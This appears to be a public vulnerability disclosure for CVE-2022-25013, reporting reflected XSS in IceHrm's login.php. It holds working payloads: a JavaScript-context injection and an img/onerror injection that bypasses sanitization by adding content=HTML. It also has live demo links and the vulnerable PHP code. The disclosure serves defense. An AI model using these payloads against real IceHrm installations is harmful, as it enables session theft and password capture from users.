Headline
CVE-2022-25013: Reflected XSS vulnerabilities in login.php -- can be used to leak passwords · Issue #284 · gamonoid/icehrm
Ice Hrm 30.0.0.OS was discovered to contain multiple reflected cross-site scripting (XSS) vulnerabilities via the “key” and “fm” parameters in the component login.php.
Important note :
This vulnerability was reported to the maintainers on Nov 23rd, 2021, and there has been no response yet. So, I infer it makes sense to publish it publicly here for the good sake of everyone who is using this software actively.
Description
DOM XSS in login.php GET parameter key
.
The input to key
GET parameter is unsanitized as required for the context (javascript context ), and gets reflected in the DOM.
Proof of Concept****Occurrence 1 : Request param key
Request:
GET /login.php?key=%27;alert(document.cookie)// HTTP/1.1
Host: icehrmpro.gamonoid.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Alt-Used: icehrmpro.gamonoid.com
Connection: keep-alive
Cookie: PHPSESSID=6jua1ee8xx4s4cqcl3xxx9itr7;
Upgrade-Insecure-Requests: 1
Follow the link : https://icehrmpro.gamonoid.com/login.php?key=%27;alert(document.cookie)// to test this vulnerability on the live demo version of the website.
Occurence 2 : Request param fm
The payload passed fm
gets sanitized by PHP code. This could be bypassed by adding an extra GET param content
with the value HTML
. Thus backend will not sanitize any user input.
GET /login.php?f=boo&fm=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E&content=HTML HTTP/1.1
Host: icehrmpro.gamonoid.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Alt-Used: icehrmpro.gamonoid.com
Connection: keep-alive
Cookie: PHPSESSID=6jua1ee8qu4s4cqcl3gqm9itr7; _ga=GA1.2.267929257.1637661597; _gid=GA1.2.561894500.1637661597
Upgrade-Insecure-Requests: 1
Follow the link : https://icehrmpro.gamonoid.com/login.php?f=boo&fm=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E&content=HTML to test this vulnerability on the live demo version of the website.
Impact
This vulnerability is capable of script execution on the victim’s browser.
It’s possible to run a keylogger script and capture password of the victim user who tries to login by typing in thier credentials.
References
https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting
Occurrences
HTML sanitization can be bypassed with an extra content=HTML
GET param
https://github.com/gamonoid/icehrm/blob/master/core/login.php#L357-L361
<script type="text/javascript">
var key = "";
<?php if (isset($_REQUEST[‘key’])) {?>
key = '<?=$_REQUEST[‘key’]?>’;
key = key.replace(/ /g,"+");
<?php }?>
</script>